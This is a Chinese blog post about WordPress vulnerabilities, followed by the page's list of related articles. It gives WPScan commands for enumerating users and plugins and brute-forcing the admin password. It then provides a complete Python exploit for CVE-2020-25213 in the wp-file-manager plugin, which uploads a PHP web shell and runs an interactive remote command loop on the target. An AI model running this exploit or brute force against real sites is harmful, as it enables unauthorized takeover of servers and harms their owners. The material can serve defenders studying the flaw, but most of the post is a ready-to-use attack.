Wordpress漏洞

于 2024-08-16 12:12:16 发布
阅读量419 收藏
点赞数 13
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44737168/article/details/141256330
版权
WPScan

WPScan是Kali Linux默认自带针对wordpress的一款扫描神器

1、刺探基础信息:
wpscan --url http://www.example.com

2、猜解后台用户名
wpscan --url http://www.example.com --enumerate u

3、使用字典暴破用户名admin的密码
wpscan --url http://www.example.com -P password.txt -U admin 

4、扫描插件
wpscan --url http://www.example.com --enumerate p

5、扫描易受攻击的插件
wpscan --url http://www.example.com --enumerate vp

6、扫描所有插件
wpscan --url http://www.example.com --enumerate ap

7.建议扫描的时候使用aggressive模式,不然有些插件扫描不出来
wpscan --url http://192.168.1.72 --enumerate ap --plugins-detection aggressive
CVE-2020-25213 WordPress远程代码执行漏洞

WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在CVE-2020-25213 漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。

POC&EXP
mport json
import requests

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                  "Chrome/91.0.4472.124 Safari/537.36 "
}

url_tail = "/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
upfiles_path = "/wordpress/wp-content/plugins/wp-file-manager/lib/files"
payload = "?cmd="

"""
    漏洞验证_1
    检测响应中是否有errUnknownCmd
"""


def Check_1(url):
    url_2 = url + url_tail
    res1 = requests.get(url=url_2, headers=headers)
    text1 = res1.text
    text2 = json.loads(text1)
    key = json.dumps(text2)  # 将json转换为字符串
    print(text2)
    key1 = "errUnknownCmd"
    if key1 in key:
        print("疑似漏洞存在")
        Next = input("是否进一步验证 Y or N :")
        if Next == "Y":
            Check_2(url)
    else:
        print("漏洞不存在")


"""
 漏洞验证_2
    访问上传的php文件是否有正确响应
    这里上传的php文件内容:<?php phpinfo() ?>
"""


def Check_2(url):
    data = {
        'cmd': 'upload',
        'target': 'l1_',
    }
    files = {
        'upload[0]': open('phpinfo.php', 'rb'),
    }
    url_3 = url + url_tail
    res = requests.post(url=url_3, headers=headers, data=data, files=files, verify=False)
    if res.status_code == requests.codes.ok:
        # print("上传成功!")
        d = res.json()
        p = d.get('added', [])[0].get('url')
        Finally_url = f'{url}{p}'
        res2 = requests.get(url=Finally_url, headers=headers)
        key2 = "PHP Version"
        if key2 in res2.text:
            print("CVE-2020-25213漏洞存在! ")
            flag = input("是否进行漏洞利用 Y or N :")
            if flag == "Y":
                while 1:
                    command = input("输入执行的命令: ")
                    if command == "exit":
                        break
                    exploit(url, command)
        else:
            print("漏洞不存在!")

"""
    漏洞利用
    上传php文件并调用命令执行
    exploit.php内容:<?php system($_GET['cmd']); ?>
"""

def exploit(url, command):
    data = {
        'cmd': 'upload',
        'target': 'l1_',
    }
    files = {
        'upload[0]': open('exploit.php', 'rb'),
    }
    url_2 = url + url_tail
    file_status = url + upfiles_path + "/exploit.php"
    res = requests.get(url=file_status, headers=headers, verify=False)
    if res.status_code == requests.codes.ok:
        Fin_url = file_status + payload + command
        res3 = requests.get(url=Fin_url, headers=headers)
        res3.encoding = 'gbk'
        print(res3.text)

    else:
        res2 = requests.post(url=url_2, headers=headers, data=data, files=files, verify=False)
        if res2.status_code == requests.codes.ok:
            # print("上传成功!")
            d = res2.json()
            p = d.get('added', [])[0].get('url')
            url_3 = f'{url}{p}'
            Fin_url = url_3 + payload + command
            res2 = requests.get(url=Fin_url, headers=headers)
            res2.encoding = 'gbk'
            print(res2.text)


def main():
    url = input("输入测试的URL:")
    Check_1(url)


if __name__ == '__main__':
    main()

老芒果886
关注
WordPress plugin 代码注入漏洞(CVE-2022-24663)
千寻的博客
12-09 2458
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 `PHP Everywhere `的请求,并在站点上执行任意 PHP 代码。 存在常见用户名低权限用户弱口令
wordpress 漏洞_WordPress漏洞分析
weixin_42514783的博客
01-26 5427
根据CVE官方漏洞通报得知wordpress新出一个组合式rce漏洞漏洞编号分别为CVE-2019-8943和CVE-2019-8942,下载漏洞版本源码,分析漏洞触发过程,注:漏洞复现时一定要断网搭建,wordpress在联网状态时会自动更新代码包。找到漏洞发生文件 post.php,wordpress有多个post.php文件,这里简要说明一下各自的作用,wp-includes/post.p...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 954
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
wordpress 漏洞_轻松发现WordPress漏洞
热门推荐
culi4814的博客
08-24 1万+
wordpress 漏洞As a developer or design professional, one of the biggest benefits of building your sites on WordPress is that in most cases you are building your code on a proven platform which has been ...
CVE-2017-5489 WordPress漏洞
qq_33440662的博客
11-23 532
看我如何挖掘到WordPress漏洞并最终拿下$1337的赏金
WordPress扫描程序:WordPress漏洞扫描程序
02-05
Wordpress Scanner能够发现Wordpress安装中的缺陷,并将提供有关该漏洞的所有信息。 Wordpress Scanner不是用于代码审核的工具,它对Wordpress支持的Web应用程序执行“黑匣子”扫描。 基本安全检查将检查WordPress...
php wordpress漏洞,一款强大的WordPress漏洞利用框架 - WPXF
weixin_35779001的博客
03-25 617
今天给大家介绍的工具是一款Ruby框架,该框架采用模块化开发,旨在帮助安全研究专家对基于WordPress的网站和系统进行渗透测试工作。工具运行要求确保你系统中安装的Ruby版本>=2.2.6,然后在终端命令窗口中切换到WPXF项目所在目录,并运行命令“bundle install”来安装和配置依赖环境。如果你在系统中无法找到bundler的话,你可以通过运行命令“gem install b...
简单了解cms,复现vulhub中的wordpress漏洞
weixin_64655821的博客
09-12 1060
简单了解cms,复现vulhub中的wordpress漏洞
wordpress 漏洞
09-03
关于WordPress漏洞,有一些常见的安全问题需要注意。首先,确保你的WordPress核心、主题和插件都是最新版本,因为更新通常包含了修复漏洞的补丁。同时,避免使用来自不受信任的来源的主题和插件,因为它们可能包含...
wp-plugin-vulnerabilities:WordPress插件漏洞的集合
05-16
wp-plugin漏洞 WordPress插件漏洞的标准化集合。 用于此目的的数据已从WordPress.org存储库中的“”插件中提取,并以标准的YAML格式存储。 这些开发人员已为此YAML提供了所有原始源数据,我们所做的只是从PHP源代码中提取数据并将其存储在YAML中。 YAML结构的密钥是WordPress.org插件的子标签,可用于使用插件的目录名称轻松地识别已安装的插件(不幸的是,由于WordPress.org插件的性质,这种方法并不总是可靠的)。 我们将尽一切努力使它保持最新状态并与插件版本保持一致。 标签是从插件导入数据的日期,并查看它是“最新”的,将其与该插件的“最新更新”日期发布进行比较。 我想与原始开发人员合作,为此创建一个标准的数据存储,所以我还是朝着前进的方向迈进了-这毕竟是开源项目的目的。 为了帮助这个项目,请随时发出拉取请求等,我将在适当的时候考虑
WordPress Plugin SQL注入漏洞(CVE-2024-25832)
最新发布
2301_80127209的博客
06-18 549
WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
wordpress4.9漏洞
小小猪的博客
12-01 8220
漏洞介绍: WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标。这次实验的漏洞是在WordPress核心中的一个经过身份验证的任意文件删除漏洞CVE-2018-20714 该漏洞可能导致攻击者执行任意代码。该漏洞自发现到报告给W
插件漏洞导致 60 万个 WordPress 网站遭受攻击
网络研究观
11-16 4801
建议所有使用该插件的用户尽快升级到最新版本。
wordpress 漏洞_WordPress漏洞。 如何保护我的WordPress博客?
culin0274的博客
08-10 526
wordpress 漏洞 WordPress, being one of the most popular blogging platforms used, powers 60 million websites worldwide. So quite naturally, it is a prime target for criminals to try and find exploits in...
WordPress安全漏洞:从任意文件删除到任意代码执行
jisuyunzzc的博客
05-29 504
WordPress安全漏洞:从任意文件删除到任意代码执行 WordPress是网络上最受欢迎的CMS系统。据w3tech统计,约有30%的网站运行了该系统。该系统的应用是如此广泛,难免会成为网络犯罪分子攻击目标。在这篇博文中,我们将为读者介绍WordPress内核中的一个任意文件删除漏洞,这个漏洞可能会导致攻击者执行任意代码。早在7个月前,我们就向WordPress安全团队报告了这个漏洞,但到目前为止,该漏洞仍然没有得到修补。自初次报告(该报告既没有提供任何补丁,也没有给出具体的修复计划)至今,已经过了漫长
wordpress漏洞工具_WordPress开发人员工具
culi3182的博客
08-20 246
wordpress漏洞工具WordPress has become one of the most widely used design resources available for web development in 2013, with around 54% of all sites that are known CMS sites using WordPress over Drupal ...
wordpress 4.6 RCE漏洞利用(CVE-2016-10033)
xiaobai_20190815的博客
04-08 5399
一、漏洞描述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行 二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面 四、漏洞利用 1、抓包,构造POST /wp-login.p
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值